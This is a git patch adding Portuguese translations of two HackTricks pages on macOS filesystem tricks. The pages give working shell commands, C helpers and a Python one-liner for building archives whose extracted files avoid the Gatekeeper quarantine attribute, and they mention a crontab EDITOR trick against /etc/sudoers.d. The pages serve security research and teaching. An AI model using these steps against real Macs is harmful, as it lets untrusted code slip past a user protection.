From 48c199dc646e53982d1a20eec62f525851ac16a7 Mon Sep 17 00:00:00 2001 From: Translator Date: Wed, 18 Oct 2023 17:56:06 +0000 Subject: [PATCH] Translated ['macos-hardening/macos-security-and-privilege-escalation/mac --- SUMMARY.md | 3 +- .../macos-fs-tricks/README.md | 113 ++++++++++ .../macos-xattr-acls-extra-stuff.md | 194 ++++++++++++++++++ 3 files changed, 309 insertions(+), 1 deletion(-) create mode 100644 macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-fs-tricks/README.md create mode 100644 macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-fs-tricks/macos-xattr-acls-extra-stuff.md diff --git a/SUMMARY.md b/SUMMARY.md index 0fcee7252..edec6b1ad 100644 --- a/SUMMARY.md +++ b/SUMMARY.md @@ -189,7 +189,8 @@ * [macOS TCC Bypasses](macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/macos-tcc-bypasses/README.md) * [macOS Apple Scripts](macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/macos-tcc-bypasses/macos-apple-scripts.md) * [macOS Dangerous Entitlements & TCC perms](macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-dangerous-entitlements.md) - * [macOS FS Tricks](macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-fs-tricks.md) + * [macOS FS Tricks](macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-fs-tricks/README.md) + * [macOS xattr-acls extra stuff](macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-fs-tricks/macos-xattr-acls-extra-stuff.md) * [macOS Users](macos-hardening/macos-security-and-privilege-escalation/macos-users.md) * [macOS Red Teaming](macos-hardening/macos-red-teaming/README.md) * [macOS MDM](macos-hardening/macos-red-teaming/macos-mdm/README.md) diff --git a/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-fs-tricks/README.md b/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-fs-tricks/README.md new file mode 100644 index 000000000..9e8f56175 --- /dev/null +++ b/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-fs-tricks/README.md @@ -0,0 +1,113 @@ +# Truques do macOS FS + +
+ +☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥 + +* Você trabalha em uma **empresa de cibersegurança**? Você quer ver sua **empresa anunciada no HackTricks**? ou você quer ter acesso à **última versão do PEASS ou baixar o HackTricks em PDF**? Verifique os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)! +* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family) +* Adquira o [**swag oficial do PEASS & HackTricks**](https://peass.creator-spring.com) +* **Junte-se ao** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-me** no **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.** +* **Compartilhe seus truques de hacking enviando PRs para o** [**repositório hacktricks**](https://github.com/carlospolop/hacktricks) **e** [**repositório hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud). + +
+ +## FD Arbitrário + +Se você pode fazer um **processo abrir um arquivo ou uma pasta com privilégios elevados**, você pode abusar do **`crontab`** para abrir um arquivo em `/etc/sudoers.d` com **`EDITOR=exploit.py`**, assim o `exploit.py` obterá o FD para o arquivo dentro de `/etc/sudoers` e o abusará. + +Por exemplo: [https://youtu.be/f1HA5QhLQ7Y?t=21098](https://youtu.be/f1HA5QhLQ7Y?t=21098) + +## Truques para evitar atributos de quarentena + +### Flag uchg + +Se um arquivo/pasta tiver esse atributo imutável, não será possível colocar um xattr nele. +```bash +echo asd > /tmp/asd +chflags uchg /tmp/asd +xattr -w com.apple.quarantine "" /tmp/asd +xattr: [Errno 1] Operation not permitted: '/tmp/asd' + +ls -lO /tmp/asd +# check the "uchg" in the output +``` +### Montagem do defvfs + +Uma montagem do **devfs** **não suporta xattr**, mais informações em [**CVE-2023-32364**](https://gergelykalman.com/CVE-2023-32364-a-macOS-sandbox-escape-by-mounting.html) +```bash +mkdir /tmp/mnt +mount_devfs -o noowners none "/tmp/mnt" +chmod 777 /tmp/mnt +mkdir /tmp/mnt/lol +xattr -w com.apple.quarantine "" /tmp/mnt/lol +xattr: [Errno 1] Operation not permitted: '/tmp/mnt/lol' +``` +### ACL writeextattr + +Esta ACL impede a adição de `xattrs` ao arquivo. +```bash +rm -rf /tmp/test* +echo test >/tmp/test +chmod +a "everyone deny write,writeattr,writeextattr,writesecurity,chown" /tmp/test +ls -le /tmp/test +ditto -c -k test test.zip +# Download the zip from the browser and decompress it, the file should be without a quarantine xattr + +cd /tmp +echo y | rm test + +# Decompress it with ditto +ditto -x -k --rsrc test.zip . +ls -le /tmp/test + +# Decompress it with open (if sandboxed decompressed files go to the Downloads folder) +open test.zip +sleep 1 +ls -le /tmp/test +``` +### **com.apple.acl.text xattr + AppleDouble** + +O formato de arquivo **AppleDouble** copia um arquivo incluindo suas ACEs. + +No [**código-fonte**](https://opensource.apple.com/source/Libc/Libc-391/darwin/copyfile.c.auto.html), é possível ver que a representação de texto do ACL armazenada dentro do xattr chamado **`com.apple.acl.text`** será definida como ACL no arquivo descompactado. Portanto, se você comprimir um aplicativo em um arquivo zip com o formato de arquivo **AppleDouble** com um ACL que impede que outros xattrs sejam gravados nele... o xattr de quarentena não será definido no aplicativo: + +Verifique o [**relatório original**](https://www.microsoft.com/en-us/security/blog/2022/12/19/gatekeepers-achilles-heel-unearthing-a-macos-vulnerability/) para obter mais informações. + +Para replicar isso, primeiro precisamos obter a string de acl correta: +```bash +# Everything will be happening here +mkdir /tmp/temp_xattrs +cd /tmp/temp_xattrs + +# Create a folder and a file with the acls and xattr +mkdir del +mkdir del/test_fold +echo test > del/test_fold/test_file +chmod +a "everyone deny write,writeattr,writeextattr,writesecurity,chown" del/test_fold +chmod +a "everyone deny write,writeattr,writeextattr,writesecurity,chown" del/test_fold/test_file +ditto -c -k del test.zip + +# uncomporess to get it back +ditto -x -k --rsrc test.zip . +ls -le test +``` +(Note que mesmo que isso funcione, a sandbox escreve o atributo de quarentena antes) + +Não é realmente necessário, mas eu deixo aqui caso seja necessário: + +{% content-ref url="macos-xattr-acls-extra-stuff.md" %} +[macos-xattr-acls-extra-stuff.md](macos-xattr-acls-extra-stuff.md) +{% endcontent-ref %} + +
+ +☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥 + +* Você trabalha em uma **empresa de cibersegurança**? Você quer ver sua **empresa anunciada no HackTricks**? ou você quer ter acesso à **última versão do PEASS ou baixar o HackTricks em PDF**? Verifique os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)! +* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family) +* Adquira o [**swag oficial do PEASS & HackTricks**](https://peass.creator-spring.com) +* **Junte-se ao** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo Telegram**](https://t.me/peass) ou **siga-me** no **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.** +* **Compartilhe seus truques de hacking enviando PRs para o** [**repositório hacktricks**](https://github.com/carlospolop/hacktricks) **e** [**repositório hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud). + +
diff --git a/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-fs-tricks/macos-xattr-acls-extra-stuff.md b/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-fs-tricks/macos-xattr-acls-extra-stuff.md new file mode 100644 index 000000000..1b8f7da04 --- /dev/null +++ b/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-fs-tricks/macos-xattr-acls-extra-stuff.md @@ -0,0 +1,194 @@ +# Recursos adicionais de xattr-acls do macOS + +
+ +☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥 + +* Você trabalha em uma **empresa de cibersegurança**? Gostaria de ver sua **empresa anunciada no HackTricks**? Ou gostaria de ter acesso à **última versão do PEASS ou baixar o HackTricks em PDF**? Verifique os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)! +* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family) +* Adquira o [**swag oficial do PEASS & HackTricks**](https://peass.creator-spring.com) +* **Junte-se ao** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo Telegram**](https://t.me/peass) ou **siga-me** no **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.** +* **Compartilhe seus truques de hacking enviando PRs para o** [**repositório hacktricks**](https://github.com/carlospolop/hacktricks) **e o** [**repositório hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud). + +
+```bash +rm -rf /tmp/test* +echo test >/tmp/test +chmod +a "everyone deny write,writeattr,writeextattr,writesecurity,chown" /tmp/test +./get_acls test +ACL for test: +!#acl 1 +group:ABCDEFAB-CDEF-ABCD-EFAB-CDEF0000000C:everyone:12:deny:write,writeattr,writeextattr,writesecurity,chown + +ACL in hex: \x21\x23\x61\x63\x6c\x20\x31\x0a\x67\x72\x6f\x75\x70\x3a\x41\x42\x43\x44\x45\x46\x41\x42\x2d\x43\x44\x45\x46\x2d\x41\x42\x43\x44\x2d\x45\x46\x41\x42\x2d\x43\x44\x45\x46\x30\x30\x30\x30\x30\x30\x30\x43\x3a\x65\x76\x65\x72\x79\x6f\x6e\x65\x3a\x31\x32\x3a\x64\x65\x6e\x79\x3a\x77\x72\x69\x74\x65\x2c\x77\x72\x69\x74\x65\x61\x74\x74\x72\x2c\x77\x72\x69\x74\x65\x65\x78\x74\x61\x74\x74\x72\x2c\x77\x72\x69\x74\x65\x73\x65\x63\x75\x72\x69\x74\x79\x2c\x63\x68\x6f\x77\x6e\x0a +``` +
+ +Código de get_acls +```c +// gcc -o get_acls get_acls +#include +#include +#include + +int main(int argc, char *argv[]) { +if (argc != 2) { +fprintf(stderr, "Usage: %s \n", argv[0]); +return 1; +} + +const char *filepath = argv[1]; +acl_t acl = acl_get_file(filepath, ACL_TYPE_EXTENDED); +if (acl == NULL) { +perror("acl_get_file"); +return 1; +} + +char *acl_text = acl_to_text(acl, NULL); +if (acl_text == NULL) { +perror("acl_to_text"); +acl_free(acl); +return 1; +} + +printf("ACL for %s:\n%s\n", filepath, acl_text); + +// Convert acl_text to hexadecimal and print it +printf("ACL in hex: "); +for (char *c = acl_text; *c != '\0'; c++) { +printf("\\x%02x", (unsigned char)*c); +} +printf("\n"); + +acl_free(acl); +acl_free(acl_text); +return 0; +} +``` +
+```bash +# Lets add the xattr com.apple.xxx.xxxx with the acls +mkdir start +mkdir start/protected +./set_xattr start/protected +echo something > start/protected/something +``` +
+ +Código de set_xattr +```c +// gcc -o set_xattr set_xattr.c +#include +#include +#include +#include +#include + + +void print_xattrs(const char *filepath) { +ssize_t buflen = listxattr(filepath, NULL, 0, XATTR_NOFOLLOW); +if (buflen < 0) { +perror("listxattr"); +return; +} + +char *buf = malloc(buflen); +if (buf == NULL) { +perror("malloc"); +return; +} + +buflen = listxattr(filepath, buf, buflen, XATTR_NOFOLLOW); +if (buflen < 0) { +perror("listxattr"); +free(buf); +return; +} + +printf("All current extended attributes for %s:\n", filepath); +for (char *name = buf; name < buf + buflen; name += strlen(name) + 1) { +printf("%s: ", name); +ssize_t valuelen = getxattr(filepath, name, NULL, 0, 0, XATTR_NOFOLLOW); +if (valuelen < 0) { +perror("getxattr"); +continue; +} + +char *value = malloc(valuelen + 1); +if (value == NULL) { +perror("malloc"); +continue; +} + +valuelen = getxattr(filepath, name, value, valuelen, 0, XATTR_NOFOLLOW); +if (valuelen < 0) { +perror("getxattr"); +free(value); +continue; +} + +value[valuelen] = '\0'; // Null-terminate the value +printf("%s\n", value); +free(value); +} + +free(buf); +} + + +int main(int argc, char *argv[]) { +if (argc != 2) { +fprintf(stderr, "Usage: %s \n", argv[0]); +return 1; +} + +const char *hex = "\x21\x23\x61\x63\x6c\x20\x31\x0a\x67\x72\x6f\x75\x70\x3a\x41\x42\x43\x44\x45\x46\x41\x42\x2d\x43\x44\x45\x46\x2d\x41\x42\x43\x44\x2d\x45\x46\x41\x42\x2d\x43\x44\x45\x46\x30\x30\x30\x30\x30\x30\x30\x43\x3a\x65\x76\x65\x72\x79\x6f\x6e\x65\x3a\x31\x32\x3a\x64\x65\x6e\x79\x3a\x77\x72\x69\x74\x65\x2c\x77\x72\x69\x74\x65\x61\x74\x74\x72\x2c\x77\x72\x69\x74\x65\x65\x78\x74\x61\x74\x74\x72\x2c\x77\x72\x69\x74\x65\x73\x65\x63\x75\x72\x69\x74\x79\x2c\x63\x68\x6f\x77\x6e\x0a"; +const char *filepath = argv[1]; + +int result = setxattr(filepath, "com.apple.xxx.xxxx", hex, strlen(hex), 0, 0); +if (result == 0) { +printf("Extended attribute set successfully.\n\n"); +} else { +perror("setxattr"); +return 1; +} + +print_xattrs(filepath); + +return 0; +} +``` +
+ +{% code overflow="wrap" %} +```bash +# Create appledoublefile with the xattr entitlement +ditto -c -k start protected.zip +rm -rf start +# extract the files +unzip protected.zip +# Replace the name of the xattr here (if you put it before ditto would have destroyed it) +python3 -c "with open('._protected', 'rb+') as f: content = f.read().replace(b'com.apple.xxx.xxxx', b'com.apple.acl.text'); f.seek(0); f.write(content); f.truncate()" +# zip everything back together +rm -rf protected.zip +zip -r protected.zip protected ._protected +rm -rf protected +rm ._* +``` +{% endcode %} +```bash +# Check if it worked +ditto -x -k --rsrc protected.zip . +xattr -l protected +``` +
+ +☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥 + +* Você trabalha em uma **empresa de cibersegurança**? Você quer ver sua **empresa anunciada no HackTricks**? ou você quer ter acesso à **última versão do PEASS ou baixar o HackTricks em PDF**? Verifique os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)! +* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family) +* Adquira o [**swag oficial do PEASS & HackTricks**](https://peass.creator-spring.com) +* **Junte-se ao** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-me** no **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.** +* **Compartilhe seus truques de hacking enviando PRs para o** [**repositório hacktricks**](https://github.com/carlospolop/hacktricks) **e** [**repositório hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud). + +